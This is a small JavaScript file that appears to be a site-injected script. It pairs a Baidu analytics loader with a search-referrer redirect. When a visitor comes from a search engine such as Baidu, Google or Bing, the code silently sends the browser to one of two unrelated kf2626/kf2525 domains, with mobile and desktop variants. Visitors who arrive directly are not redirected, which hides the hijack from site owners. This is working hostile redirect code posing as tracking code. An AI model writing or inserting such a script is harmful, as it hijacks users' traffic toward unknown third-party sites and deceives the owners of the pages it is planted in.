var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?5f003303e789f4619071208b12c9c281";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var regexp = /\.(baidu|haosou|so|sogou|soso|google|sm|yahoo|bing|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where = document.referrer;
if (regexp.test(where)) {
  if (/mobile|android|iphone|ipad|phone/i.test(navigator.userAgent.toLowerCase())) {
    location.href=(Math.random()<0.5)?"http://m.kf2626.com":"http://m.kf2525.com";
  }
  else{
    location.href=(Math.random()<0.5)?"http://www.kf2626.com":"http://www.kf2525.com";
  }
}